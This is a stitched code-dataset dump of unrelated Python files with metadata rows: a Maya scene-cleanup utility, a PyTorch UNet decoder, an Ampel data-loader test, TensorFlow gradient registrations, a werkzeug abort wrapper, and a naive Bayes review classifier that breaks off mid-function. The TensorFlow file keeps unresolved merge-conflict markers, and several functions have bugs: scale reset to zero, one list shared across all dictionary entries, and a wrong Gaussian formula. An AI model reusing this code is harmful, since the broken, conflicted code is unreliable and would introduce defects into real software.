# Return Result
return noShaderList
def unusedReferenceCheck():
'''
Return a list of unused reference nodes.
'''
# Initialize Return List
result = []
# Get list of existing references
refList = glTools.utils.reference.listReferences()
# Check Unused Reference
for ref in refList:
try: refFile = glTools.utils.reference.getReferenceFile(ref)
except: result.append(ref)
# Return Result
return result
def unknownNodeCheck():
'''
Return a list of unknown nodes.
'''
result = mc.ls(type='unknown')
if not result: result = []
return result
def checkTransforms(objList=[],tol=0.0000000001):
'''
Check for non-zero transforms
@param objList: List of transforms to check.
@type objList: list
@param tol: Value tolerance.
@type tol: float
'''
# Check Object List
if not objList: objList = mc.ls(transforms=True)
if not objList: return []
# Check Transforms
transformList = []
for obj in objList:
# Skip Default Transforms
if obj == 'persp': continue
if obj == 'front': continue
if obj == 'side': continue
if obj == 'top': continue
# Translate
if abs(mc.getAttr(obj+'.tx')) > tol:
transformList.append(obj)
continue
if abs(mc.getAttr(obj+'.ty')) > tol:
transformList.append(obj)
continue
if abs(mc.getAttr(obj+'.tz')) > tol:
transformList.append(obj)
continue
# Rotate
if abs(mc.getAttr(obj+'.rx')) > tol:
transformList.append(obj)
continue
if abs(mc.getAttr(obj+'.ry')) > tol:
transformList.append(obj)
continue
if abs(mc.getAttr(obj+'.rz')) > tol:
transformList.append(obj)
continue
# Scale
if abs(mc.getAttr(obj+'.sx') - 1.0) > tol:
transformList.append(obj)
continue
if abs(mc.getAttr(obj+'.sy') - 1.0) > tol:
transformList.append(obj)
continue
if abs(mc.getAttr(obj+'.sz') - 1.0) > tol:
transformList.append(obj)
continue
# Return Result
return transformList
def displayOverridesCheck(objList=[]):
'''
Check all/specified objects for display overrides
@param objList: List of DAG nodes to check. If empty, use all DAG nodes in scene
@type objList: list
'''
# Check Object List
if not objList: objList = mc.ls(dag=True)
else: objList = mc.ls(objList,dag=True)
# Check Display Overrides
displayOverrideList = []
for obj in objList:
if mc.getAttr(obj+'.overrideEnabled'):
displayOverrideList.append(obj)
# Return Result
return displayOverrideList
# =========
# - Fixes -
# =========
def shapeNameFix(shape):
'''
Fix incorrectly named geometry shape node
@param objList: List of objects to check for valid shape names.
@type objList: list
@param typeList: List of shape types to check for valid names.
@type typeList: list
@param skipIntermediates: Skip intermediate shapes
@type skipIntermediates: bool
'''
# Get Shape Transform Parent
parent = mc.listRelatives(shape,p=True)[0]
# Check Shape Name
shapeName = parent+'Shape'
if mc.objExists(shapeName):
raise Exception('Shape "'+shapeName+'" already exists! Unable to rename shape "'+shape+'"!')
# Rename Shape
newShape = mc.rename(shape,shapeName)
# Return Result
return newShape
def deleteIntermediateShapes(objList=[]):
'''
Delete all intermediate shapes in the scene
'''
# Get list of intermediate shapes
intermediateShapeList = intermediateShapesCheck(objList)
# Delete intermediate shapes
if intermediateShapeList: mc.delete(intermediateShapeList)
# Return result
return intermediateShapeList
def deleteConstructionHistory(geoList=[]):
'''
Delete construction history for specified geometry
@param geoList: List of objects to delete for construction history from.
@type geoList: list
'''
# Get Scene Geometry
if not geoList: geoList = mc.ls(geometry=True)
# Delete History
for geo in geoList: mc.delete(geo,ch=True)
# Return Result
return geoList
def deleteUserAttrs(nodeList=[],includeShapes=False):
'''
Delete user defined attributes from the specified list of nodes
@param nodeList: List of nodes to delete user defined attrs from. If empty, assume all nodes.
@type nodeList: list
@param includeShapes: Delete user attributes
@type includeShapes: bool
'''
# Check nodeList
if not nodeList: nodeList = mc.ls()
# For each node
for node in nodeList:
# Delete user attributes
glTools.utils.attribute.deleteUserAttrs(node)
# Include Shapes
if includeShapes:
# Delete shape user attributes
shapes = mc.listRelatives(node,s=True)
for shape in shapes:
glTools.utils.attribute.deleteUserAttrs(shape)
def deleteEmptyGroups(objList=[]):
'''
Delete empty groups
'''
# Get Empty Group List
emptyGrpList = emptyGroupCheck(objList=objList)
# Delete Empty Groups
if emptyGrpList: mc.delete(emptyGrpList)
# Return Result
return emptyGrpList
def deleteEmptySets(setList=[]):
'''
Delete empty groups
'''
# Get Empty Group List
emptySetList = emptySetCheck(setList=setList)
# Delete Empty Groups
if emptySetList: mc.delete(emptySetList)
# Return Result
return emptySetList
def deleteEmptyLayers(layerList=[]):
'''
Delete empty groups
'''
# Get Empty Group List
emptyLayerList = emptyLayerCheck(layerList=layerList)
# Delete Empty Groups
if emptyLayerList: mc.delete(emptyLayerList)
# Return Result
return emptyLayerList
def deleteUnknownNodes():
'''
Delete all node of type "unknown" in the scene
'''
# Get list of unknown nodes
unknownNodes = unknownNodeCheck() or []
# Delete unknown nodes
for node in unknownNodes:
try:
mc.lockNode(node,l=False)
mc.delete(node)
except:
print('Problem deleting unknown node "'+node+'"!')
# Return Result
return unknownNodes
def deleteNodesByType(nodeTypeList=[]):
'''
Delete nodes of the specified type(s).
@param nodeTypeList: List of node types to delete.
@type nodeTypeList: list
'''
# Check Node Types
if not nodeTypeList: return []
# Get Node List (by type)
nodeList = mc.ls(type=nodeTypeList)
# Delete Nodes
if nodeList: mc.delete(nodeList)
else: nodeList = []
# Return Result
return nodeList
def deleteUnusedReferenceNodes():
'''
Delete all unused reference nodes in the scene
'''
mm.eval('RNdeleteUnused')
def deleteEmptySets(setList=[]):
'''
Delete empty object sets
@param setList: A list of sets to check. If empty, chack all sets in current scene.
@type setList: list
'''
# Check setList
if not setList: setList = mc.ls(sets=True)
# Check empty sets
emptySetList = []
for set in setList:
if not mc.sets(set,q=True):
emptySetList.append(set)
# Delete empty sets
for emptySet in emptySetList:
try: mc.delete(emptySet)
except: pass
# Return result
return emptySetList
def deleteAllSets(excludeList=[]):
'''
Delete unused object sets
@param excludeList: A list of sets to exclude from the list of unused sets.
@type excludeList: list
'''
# Get set list
setList = mc.ls(sets=True)
if excludeList:
excludeSetList = mc.ls(excludeList,sets=True)
setList = list(set(setList)-set(excludeSetList))
# Delete unused sets
for deleteSet in setList:
try: mc.delete(deleteSet)
except: pass
# Return result
return setList
def deleteUnusedShadingNodes():
'''
Delete all unused shading nodes in the scene
'''
#texList = mc.ls(tex=True)
#if texList: mc.delete(texList)
mm.eval('MLdeleteUnused')
def deleteDisplayLayers():
'''
Delete all display layers
'''
# Get display layer list
displayLayers = mc.ls(type='displayLayer')
displayLayers.remove('defaultLayer')
# Delete display layers
if displayLayers: mc.delete(displayLayers)
# Return result
return displayLayers
def deleteRenderLayers():
'''
Delete all render layers
'''
# Get render layer list
renderLayers = mc.ls(type='renderLayer')
renderLayers.remove('defaultRenderLayer')
# Delete render layers
if renderLayers: mc.delete(renderLayers)
# Return result
return renderLayers
def assignInitialShadingGroup(geoList=[]):
'''
Assign initialShadingGroup (lambert1) to specified geometry.
@param geoList: List of geometry to apply default shader to. If empty, use all scene geometry
@type geoList: list
'''
# Check geoList
if not geoList: geoList = mc.ls(geometry=True)
if not geoList: return []
# Assign Initial Shading Group
mc.sets(geoList,fe='initialShadingGroup')
# Return result
return geoList
def zeroTransforms(objList=[]):
'''
Reset transform values
@param objList: List of transforms to zero out.
@type objList: list
'''
# Check Object List
if not objList: objList = mc.ls(transforms=True)
if not objList: return []
# Check Transforms
for obj in objList:
# Translate
if mc.getAttr(obj+'.tx',se=True): mc.setAttr(obj+'.tx',0)
if mc.getAttr(obj+'.ty',se=True): mc.setAttr(obj+'.ty',0)
if mc.getAttr(obj+'.tz',se=True): mc.setAttr(obj+'.tz',0)
# Rotate
if mc.getAttr(obj+'.rx',se=True): mc.setAttr(obj+'.rx',0)
if mc.getAttr(obj+'.ry',se=True): mc.setAttr(obj+'.ry',0)
if mc.getAttr(obj+'.rz',se=True): mc.setAttr(obj+'.rz',0)
# Scale
if mc.getAttr(obj+'.sx',se=True): mc.setAttr(obj+'.sx',0)
if mc.getAttr(obj+'.sy',se=True): mc.setAttr(obj+'.sy',0)
if mc.getAttr(obj+'.sz',se=True): mc.setAttr(obj+'.sz',0)
# Return Result
return objList
def copyInputShapeAttrs(geoList=[]):
'''
Copy user defined attributes from an input shape to the output deforming shape.
@param geoList: List of geometry to copy atributes for.
@type geoList: list
'''
# Check Geometry List
if not geoList: geoList = mc.listRelatives(mc.ls(geometry=True) or [],p=True,pa=True) or []
if not geoList: return []
# Copy Input Shape Attrs
for geo in geoList:
# Get Output Shape
geoShape = mc.listRelatives(geo,s=True,ni=True) or []
if not geoShape:
print('No shape found for geometry transform "'+geo+'"!')
continue
# Get Input Shape
geoInputShape = geoShape[0]
try: geoInputShape = glTools.utils.shape.findInputShape(geoShape[0])
except: pass
# Copy User Attributes
if geoInputShape != geoShape[0]:
userAttr = mc.listAttr(geoInputShape,ud=True,s=True) or []
for at in userAttr: glTools.utils.attribute.copyAttr(geoInputShape,geoShape[0],at)
# ========
# - MISC -
# ========
def removeTurtle():
'''
Delete nodes and unload plgin related to the Turtle Renderer.
'''
# Remove Turtle Nodes
turtleNode = 'TurtleDefaultBakeLayer'
if mc.objExists(turtleNode):
print('Removing Turtle nodes...')
mc.lockNode(turtleNode,l=False)
mc.delete(turtleNode)
# Unload Plugin
if mc.pluginInfo('Turtle',q=True,loaded=True):
print('Unloading Turtle plugin...')
try: mc.unloadPlugin('Turtle',f=True)
except: print('Error unloading Turtle plugin!')
| utils/cleanup.py | 24,973 | Return a list of all existing animCurves of a specified type.
@param curveList: List of animCurve types to consider.
@type curveList: list
@param curveTypeList: List of animCurve types to consider.
@type curveTypeList: list
Assign initialShadingGroup (lambert1) to specified geometry.
@param geoList: List of geometry to apply default shader to. If empty, use all scene geometry
@type geoList: list
Check for non-zero transforms
@param objList: List of transforms to check.
@type objList: list
@param tol: Value tolerance.
@type tol: float
Return a list of nodes that contain construction history
@param objList: List of objects to check for construction history.
@type objList: list
Copy user defined attributes from an input shape to the output deforming shape.
@param geoList: List of geometry to copy atributes for.
@type geoList: list
Delete unused object sets
@param excludeList: A list of sets to exclude from the list of unused sets.
@type excludeList: list
Delete construction history for specified geometry
@param geoList: List of objects to delete for construction history from.
@type geoList: list
Delete all display layers
Delete empty groups
Delete empty groups
Delete empty groups
Delete empty object sets
@param setList: A list of sets to check. If empty, chack all sets in current scene.
@type setList: list
Delete all intermediate shapes in the scene
Delete nodes of the specified type(s).
@param nodeTypeList: List of node types to delete.
@type nodeTypeList: list
Delete all render layers
Delete all node of type "unknown" in the scene
Delete all unused reference nodes in the scene
Delete all unused shading nodes in the scene
Delete user defined attributes from the specified list of nodes
@param nodeList: List of nodes to delete user defined attrs from. If empty, assume all nodes.
@type nodeList: list
@param includeShapes: Delete user attributes
@type includeShapes: bool
Disable drawing overrides for all DAG descendents of the specified transform node.
@param state: The transform under which all descendent node drawing overrides will be disabled.
@type state: bool
Check all/specified objects for display overrides
@param objList: List of DAG nodes to check. If empty, use all DAG nodes in scene
@type objList: list
List empty groups.
@param objList: List of transforms to check.
@type objList: list
Return a list if empty layers
@param layerList: List of layers to check. If empty, use all existing layers in current scene.
@type layerList: list
Return a list of empty sets
@param setList: List of sets to check.
@type setList: list
Return a list of intermediate shapes.
@param objList: List of objects to check for intermediate shapes.
@type objList: list
Return a list of transforms with multiple shape nodes
@param objList: List of objects to check for multiple shapes.
@type objList: list
Return a list of non intermediate geometry shapes with no shader assignment.
@param geoList: List of geometry to check for shader assignments.
@type geoList: list
Delete nodes and unload plgin related to the Turtle Renderer.
Return a list of incorrectly named geometry shape nodes.
@param objList: List of objects to check for valid shape names. If empty, get all nodes of the specified type.
@type objList: list
@param typeList: List of shape types to check for valid names.
@type typeList: list
@param skipIntermediates: Skip intermediate shapes.
@type skipIntermediates: bool
@param skipMultipleShapes: Skip objects with multiple shape nodes.
@type skipMultipleShapes: bool
@param strict: Shape name must match parent+"Shape" to pass.
@type strict: bool
Fix incorrectly named geometry shape node
@param objList: List of objects to check for valid shape names.
@type objList: list
@param typeList: List of shape types to check for valid names.
@type typeList: list
@param skipIntermediates: Skip intermediate shapes
@type skipIntermediates: bool
Toggle the display state of all joint buffers ('Con') in the scene
@param state: The display state to set the joint buffers to
@type state: bool
Toggle the display state of all joint buffers ('Con') in the scene
@param state: The display state to set the joint buffers to
@type state: bool
Return a list of nodes with non unique names
@param objList: List of scene objects to check. If empty, use all existing scene nodes.
@type objList: list
@param transformsOnly: Check transform names only
@type transformsOnly: bool
Return a list of unknown nodes.
Return a list of unused reference nodes.
Return a list of unused shading nodes.
Return a list of user defined attributes for a specified list of nodes (and shapes).
@param objList: List of objects to check for user defined attributes.
@type objList: list
@param includeShapes: Also check shapes for user defined attributes.
@type includeShapes: bool
Check for valid names in the specified list of nodes
@param objList: List of objects to check valid names for. If empty use all scene transforms
@type objList: list
Reset transform values
@param objList: List of transforms to zero out.
@type objList: list
=========== - Cleanup - =========== Get List of Con Joints Toggle State Bone None Set Joint Radius Hide Rotate Order Return Result Get list of End joints Toggle state Bone None Set Joint Radius Hide Rotate Order Return Result ========== - Checks - ========== Get Descendent Node List ============================= - Disable Drawing Overrides - ============================= Check Override Attribute Check Override Attribute Connections Disable Drawing Overrides ================= - Return Result - ================= ========== - Checks - ========== Get list of scene nodes Determine non unique names Return result Check geo list Remove Default Nodes Check valid names Check prefixif not obj.startswith('cn_') and not obj.startswith('lf_') and not obj.startswith('rt_'): result.append(obj) Check "pasted" Check "poly" Check double underscore "__" Check names ending with a digit (0-9) Remove Duplicate Entries Return result ========== - Checks - ========== ==================== - Build Shape List - ==================== Get Shapes from Transform Check Multiple Shapes Get Shapes ===================== - Check Shape Names - ===================== Check Type Check Intermediate Object Get transform parent name Get Short Names Check Shape Name ================= - Return Result - ================= Check nodeList For each node Get All Shapes Check Intermediate Shapes Return Result Get scene transforms Iterate over scene transforms Check Transform Get transform shape list Check shape list Check number of shapes Return result Get Scene Geometry For each node Check Construction History Remove Self Ignore Node Types Check History Remove Duplicate Names Return Result Initialize Return List Check objList For each node Check Shapes Return Result Check objList Find Empty Groups Return Result Check setList Check empty sets Check Set Skip Default Sets Check Set Return result Check Layer List Check Empty Layers Check Layer Skip Default Layers Check Membership Return Result Initialize Return List List AnimCurve Nodes Return Result Check Geometry List Check Shader Assignment Return Result Initialize Return List Get list of existing references Check Unused Reference Return Result Check Object List Check Transforms Skip Default Transforms Translate Rotate Scale Return Result Check Object List Check Display Overrides Return Result ========= - Fixes - ========= Get Shape Transform Parent Check Shape Name Rename Shape Return Result Get list of intermediate shapes Delete intermediate shapes Return result Get Scene Geometry Delete History Return Result Check nodeList For each node Delete user attributes Include Shapes Delete shape user attributes Get Empty Group List Delete Empty Groups Return Result Get Empty Group List Delete Empty Groups Return Result Get Empty Group List Delete Empty Groups Return Result Get list of unknown nodes Delete unknown nodes Return Result Check Node Types Get Node List (by type) Delete Nodes Return Result Check setList Check empty sets Delete empty sets Return result Get set list Delete unused sets Return resulttexList = mc.ls(tex=True)if texList: mc.delete(texList) Get display layer list Delete display layers Return result Get render layer list Delete render layers Return result Check geoList Assign Initial Shading Group Return result Check Object List Check Transforms Translate Rotate Scale Return Result Check Geometry List Copy Input Shape Attrs Get Output Shape Get Input Shape Copy User Attributes ======== - MISC - ======== Remove Turtle Nodes Unload Plugin | 8,542 | en | 0.591728 |
import torch
import torch.nn as nn
import torch.nn.functional as F
from segmentation_models_pytorch.base import modules as md
class DecoderBlock(nn.Module):
def __init__(
self,
in_channels,
skip_channels,
out_channels,
use_batchnorm=True,
attention_type=None,
):
super().__init__()
self.conv1 = md.Conv2dReLU(
in_channels + skip_channels,
out_channels,
kernel_size=3,
padding=1,
use_batchnorm=use_batchnorm,
)
self.attention1 = md.Attention(attention_type, in_channels=in_channels + skip_channels)
self.conv2 = md.Conv2dReLU(
out_channels,
out_channels,
kernel_size=3,
padding=1,
use_batchnorm=use_batchnorm,
)
self.attention2 = md.Attention(attention_type, in_channels=out_channels)
def forward(self, x, skip=None):
x = F.interpolate(x, scale_factor=2, mode="nearest")
if skip is not None:
if skip.shape[-1] != x.shape[-1]:
skip = F.interpolate(skip, scale_factor=2, mode="nearest")
x = torch.cat([x, skip], dim=1)
x = self.attention1(x)
x = self.conv1(x)
x = self.conv2(x)
x = self.attention2(x)
return x
class CenterBlock(nn.Sequential):
def __init__(self, in_channels, out_channels, use_batchnorm=True):
conv1 = md.Conv2dReLU(
in_channels,
out_channels,
kernel_size=3,
padding=1,
use_batchnorm=use_batchnorm,
)
conv2 = md.Conv2dReLU(
out_channels,
out_channels,
kernel_size=3,
padding=1,
use_batchnorm=use_batchnorm,
)
super().__init__(conv1, conv2)
class UnetDecoder(nn.Module):
def __init__(
self,
encoder_channels,
decoder_channels,
n_blocks=5,
use_batchnorm=True,
attention_type=None,
center=False,
):
super().__init__()
if n_blocks != len(decoder_channels):
raise ValueError(
"Model depth is {}, but you provide `decoder_channels` for {} blocks.".format(
n_blocks, len(decoder_channels)
)
)
# remove first skip with same spatial resolution
encoder_channels = encoder_channels[1:]
# reverse channels to start from head of encoder
encoder_channels = encoder_channels[::-1]
# computing blocks input and output channels
head_channels = encoder_channels[0]
in_channels = [head_channels] + list(decoder_channels[:-1])
skip_channels = list(encoder_channels[1:]) + [0]
out_channels = decoder_channels
if center:
self.center = CenterBlock(head_channels, head_channels, use_batchnorm=use_batchnorm)
else:
self.center = nn.Identity()
# combine decoder keyword arguments
kwargs = dict(use_batchnorm=use_batchnorm, attention_type=attention_type)
blocks = [
DecoderBlock(in_ch, skip_ch, out_ch, **kwargs)
for in_ch, skip_ch, out_ch in zip(in_channels, skip_channels, out_channels)
]
self.blocks = nn.ModuleList(blocks)
def forward(self, *features):
features = features[1:] # remove first skip with same spatial resolution
features = features[::-1] # reverse channels to start from head of encoder
head = features[0]
skips = features[1:]
x = self.center(head)
for i, decoder_block in enumerate(self.blocks):
skip = skips[i] if i < len(skips) else None
x = decoder_block(x, skip)
return x
| segmentation_models_pytorch/decoders/unet/decoder.py | 3,818 | remove first skip with same spatial resolution reverse channels to start from head of encoder computing blocks input and output channels combine decoder keyword arguments remove first skip with same spatial resolution reverse channels to start from head of encoder | 264 | en | 0.78037 |
from ampel.t3.supply.load.T3SimpleDataLoader import T3SimpleDataLoader
from ampel.core.AmpelContext import AmpelContext
def test_instantiate(core_config, patch_mongo, ampel_logger):
"""
AbsT3Loader understands all the aliases in the ampel-core config
"""
ctx = AmpelContext.load(core_config)
aliases = ctx.config.get("alias.t3", dict)
assert len(
directives := T3SimpleDataLoader(
context=ctx,
logger=ampel_logger,
directives=[k[1:] for k in aliases.keys()]
).directives
) == len(aliases)
for d, value in zip(directives, aliases.values()):
assert d.dict(exclude_defaults=True) == value
| ampel/test/test_T3SimpleDataLoader.py | 680 | AbsT3Loader understands all the aliases in the ampel-core config | 64 | en | 0.492394 |
<<<<<<< HEAD
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Gradients for operators defined in data_flow_ops.py."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import math_ops
@ops.RegisterGradient("DynamicPartition")
def _DynamicPartitionGrads(op, *grads):
"""Gradients for DynamicPartition."""
data = op.inputs[0]
indices = op.inputs[1]
num_partitions = op.get_attr("num_partitions")
prefix_shape = array_ops.shape(indices)
original_indices = array_ops.reshape(
math_ops.range(math_ops.reduce_prod(prefix_shape)), prefix_shape)
partitioned_indices = data_flow_ops.dynamic_partition(
original_indices, indices, num_partitions)
reconstructed = data_flow_ops.parallel_dynamic_stitch(partitioned_indices,
grads)
reconstructed = array_ops.reshape(reconstructed, array_ops.shape(data))
return [reconstructed, None]
@ops.RegisterGradient("DynamicStitch")
@ops.RegisterGradient("ParallelDynamicStitch")
def _DynamicStitchGrads(op, grad):
"""Gradients for DynamicStitch and ParallelDynamicStitch."""
num_values = len(op.inputs) // 2
indices_grad = [None] * num_values
def AsInt32(x):
return (x if op.inputs[0].dtype == dtypes.int32 else
math_ops.cast(x, dtypes.int32))
inputs = [AsInt32(op.inputs[i]) for i in xrange(num_values)]
=======
"""Gradients for operators defined in data_flow_ops.py."""
from tensorflow.python.framework import ops
from tensorflow.python.framework import types
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import constant_op
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import gen_data_flow_ops
from tensorflow.python.ops import math_ops
@ops.RegisterGradient("DynamicStitch")
def _DynamicStitchGrads(op, grad):
"""Gradients for DynamicStitch."""
num_values = len(op.inputs) / 2
indices_grad = [None] * num_values
def AsInt32(x):
return (x if op.inputs[0].dtype == types.int32 else
math_ops.cast(x, types.int32))
inputs = [AsInt32(op.inputs[i]) for i in range(num_values)]
>>>>>>> f41959ccb2... TensorFlow: Initial commit of TensorFlow library.
if isinstance(grad, ops.IndexedSlices):
output_shape = array_ops.shape(op.outputs[0])
output_rows = output_shape[0]
grad = math_ops.unsorted_segment_sum(grad.values, grad.indices, output_rows)
values_grad = [array_ops.gather(grad, inp) for inp in inputs]
return indices_grad + values_grad
<<<<<<< HEAD
ops.NotDifferentiable("Queue")
ops.NotDifferentiable("QueueEnqueue")
ops.NotDifferentiable("QueueEnqueueMany")
ops.NotDifferentiable("QueueDequeue")
ops.NotDifferentiable("QueueDequeueMany")
ops.NotDifferentiable("QueueDequeueUpTo")
ops.NotDifferentiable("QueueClose")
ops.NotDifferentiable("QueueSize")
ops.NotDifferentiable("Stack")
ops.NotDifferentiable("StackPush")
ops.NotDifferentiable("StackPop")
ops.NotDifferentiable("StackClose")
ops.NotDifferentiable("GetSessionHandle")
ops.NotDifferentiable("GetSessionHandleV2")
ops.NotDifferentiable("GetSessionTensor")
ops.NotDifferentiable("DeleteSessionTensor")
=======
ops.NoGradient("Queue")
ops.NoGradient("QueueEnqueue")
ops.NoGradient("QueueEnqueueMany")
ops.NoGradient("QueueDequeue")
ops.NoGradient("QueueDequeueMany")
ops.NoGradient("QueueClose")
ops.NoGradient("QueueSize")
>>>>>>> f41959ccb2... TensorFlow: Initial commit of TensorFlow library.
| tensorflow/python/ops/data_flow_grad.py | 4,391 | Copyright 2015 The TensorFlow Authors. All Rights Reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. ============================================================================== pylint: disable=redefined-builtin | 694 | en | 0.822668 |
# -*- coding: utf-8 -*-
from werkzeug.exceptions import abort as _abort, HTTPException
def abort(http_status_code, **kwargs):
try:
_abort(http_status_code)
except HTTPException as e:
if len(kwargs):
e.data = kwargs
raise
| axe/utils.py | 267 | -*- coding: utf-8 -*- | 21 | en | 0.767281 |
import re
import numpy
import math
import sys
#implementing the stop words and
def extractCleanWords(review):
stopWords = ["in", "i", "me", "my", "myself", "we", "our", "ours", "ourselves", "you",
"your", "yours", "yourself", "yourselves", "he", "him", "his", "himself", "she",
"her", "hers", "herself", "it", "its", "itself", "they", "them", "their",
"theirs", "themselves", "what", "which", "who", "whom", "this", "that", "these",
"those", "am", "is", "are", "was", "were", "be", "been", "being", "have", "has",
"had", "having", "do", "does", "did", "doing", "a", "an", "the", "and", "but",
"if", "or", "because", "as", "until", "while", "of", "at", "by", "for", "with",
"about", "against", "between", "into", "through", "during", "before", "after",
"above", "below", "to", "from", "up", "down", "out", "on", "off", "over",
"under", "again", "further", "then", "once", "here", "there", "when", "where", "why",
"how", "all", "any", "both", "each", "few", "more", "most", "other", "some", "such",
"no", "nor", "not", "only", "own", "same", "so", "than", "too", "very", "s", "t",
"can", "will", "just", "don", "should", "now"]
words = re.sub("[^\w]", " ", review).split()
cleanWords = [i.lower() for i in words if i not in stopWords]
return cleanWords
#used by bag of words to create the vocab dictionary
def createVocabTokens(reviews):
vocab = []
for review in reviews:
token = extractCleanWords(review)
vocab.extend(token)
vocab = sorted(list(set(vocab)))
return vocab
"""the bag of words for multinomialNB does not need to create
matrixes for each review because it takes too much space and slows
it down and it is not neccesary. The bag of words returns a
dictionary with the frequencies for each word used for the numerator of
P(xi|ci), the total words in the classifier used for the denom of
P(xi|ci), and the number of reviews for the class used to calculate
the prior probabilities for each class"""
def bagOfWords_MultinomialNB(txtFile):
total_words = 0
reviewFile = txtFile
with open(reviewFile, 'r', encoding='utf8') as file:
txt = file.read().replace('\n','')
reviewList = txt.split("<br /><br />")
#print(len(reviewList))
for review in reviewList:
review = re.sub("[^\w\s]", "", review)
vocabTokens = createVocabTokens(reviewList)
#print("Word bank for reviews: \n{0} \n".format(vocabTokens));
#print(len(vocabTokens))
#bagOfWords(reviewFile)
numReviews = len(reviewList)
#print(len(reviewList))
#print(len(vocabTokens))
vocabDict = dict.fromkeys(vocabTokens, 0)
#matrix = numpy.zeros(shape = (len(reviewList),len(vocabTokens)))
for i in range(len(reviewList)):
words = extractCleanWords(reviewList[i])
#bagList = numpy.zeros(len(vocabTokens))
for word in words:
vocabDict[word] += 1
total_words +=1
#if word in vocabTokens:
#bagList[vocabTokens.index(word)] +=1
#print(i, " out of ", len(vocabTokens), " done")
#matrix[i] = bagList
#print("{0}\n{1}\n".format(review,numpy.array(bagList)))
return vocabDict, total_words, numReviews
def bagOfWords_GaussianNB(txtFile):
total_words = 0
reviewFile = txtFile
with open(reviewFile, 'r', encoding='utf8') as file:
txt = file.read().replace('\n','')
reviewList = txt.split("<br /><br />")
#print(len(reviewList))
numReviews = len(reviewList)
for review in reviewList:
review = re.sub("[^\w\s]", "", review)
vocabTokens = createVocabTokens(reviewList)
vocabDict = dict.fromkeys(vocabTokens, 0)
for i in range(len(reviewList)):
words = extractCleanWords(reviewList[i])
#bagList = numpy.zeros(len(vocabTokens))
for word in words:
vocabDict[word] += 1
sparseMatrix = []
for i in range(len(reviewList)):
#print("Gauss: ", i)
words = extractCleanWords(reviewList[i])
bagList = {}
for word in words:
if word in bagList:
bagList[word] +=1
else:
bagList[word] = 1
sparseMatrix.append(bagList)
return sparseMatrix, vocabDict, numReviews
#calculates the mean and varience using bag of words
def calcMean_Var(txtFile, tfidforBOW):
if tfidforBOW == 1:#using bag of words
sparseMatrix, vocabDict, numReviews = bagOfWords_GaussianNB(txtFile)
else:
sparseMatrix, vocabDict, numReviews = tf_idf(txtFile)
meanVarDict = {}
meanVarTouple = [0,0]
for word in vocabDict:
meanVarTouple[0] = (vocabDict[word] / numReviews)
#print(meanVarTouple[0])
var = 0
for m in sparseMatrix:
if word in m:
var += ((m[word]-meanVarTouple[0])**2)
else:
var += ((-1*meanVarTouple[0])**2)
meanVarTouple[1] = (var / (numReviews -1))
meanVarDict[word] = meanVarTouple
#print("Gauss: ", meanVarTouple)
return meanVarDict
def gaussian_BOW(trainDataPos, trainDataNeg, testData, c):
testFile = testData
with open(testFile, 'r', encoding='utf8') as file:
txt = file.read().replace('\n','')
reviewList = txt.split("<br /><br />")
for review in reviewList:
review = re.sub("[^\w\s]", "", review)
#prediction will be used for the accuracy of the classifier
prediction = []
meanVarDictPOS = calcMean_Var(trainDataPos,1)
meanVarDictNEG = calcMean_Var(trainDataNeg,1)
testWordFreq = {}
for review in reviewList:
wordsInReview = extractCleanWords(review)
for word in wordsInReview:
if (word in meanVarDictPOS) or (word in meanVarDictNEG):
if word in testWordFreq:
testWordFreq[word] += 1
else:
testWordFreq[word] = 1
for review in reviewList:
wordsInReview = list(set(extractCleanWords(review)))
probPos =0
probNeg =0
for word in wordsInReview:
if word in meanVarDictPOS:
probPos += (math.log((1/(math.sqrt(2*math.pi*meanVarDictPOS[word][1])))) - (((testWordFreq[word] - meanVarDictPOS[word][0])**2)/((meanVarDictPOS[word][1]**2))))
if word in meanVarDictNEG:
probNeg += (math.log((1/(math.sqrt(2*math.pi*meanVarDictNEG[word][1])))) - (((testWordFreq[word] - meanVarDictNEG[word][0])**2)/((meanVarDictNEG[word][1]**2))))
if probPos > probNeg:
prediction.append(1)
else:
prediction.append(0)
poss = 0
for p in prediction:
if p == c:
poss +=1
return(poss/len(prediction))
def tf_idf(txtFile):
reviewFile = txtFile
with open(reviewFile, 'r', encoding='utf8') as file:
txt = file.read().replace('\n','')
reviewList = txt.split("<br /><br />")
#print(len(reviewList))
numReviews = len(reviewList)
for review in reviewList:
review = re.sub("[^\w\s]", "", review)
vocabTokens = createVocabTokens(reviewList)
vocabDictIDF = dict.fromkeys(vocabTokens, 0)
"""for i in range(len(reviewList)):
words = extractCleanWords(reviewList[i])
#bagList = numpy.zeros(len(vocabTokens))
for word in words:
vocabDict[word] += 1"""
totalNumWords = 0
sparseMatrixTFIDF = []
for i in range(len(reviewList)):
#print("TFidf: ", i)
words = extractCleanWords(reviewList[i])
bagListTF = {}
for word in words:
totalNumWords +=1
if word in bagListTF:
bagListTF[word] +=1
else:
bagListTF[word] = 1
for word in list(set(words)):
bagListTF[word] = (bagListTF[word]/totalNumWords)
vocabDictIDF[word]+=1
sparseMatrixTFIDF.append(bagListTF)
#print(i)
#using the tf vlues in the sparse matrix and idf values in
#the vocab dict we can get the tf idf and hold it in sparse matrix
vocabDict = dict.fromkeys(vocabTokens, 0)
for dictTF in sparseMatrixTFIDF:
for word in dictTF:
dictTF[word] = (dictTF[word] * (math.log((len(reviewList)/vocabDictIDF[word]))))
vocabDict[word]+= dictTF[word]
#print(sparseMatrixTFIDF)
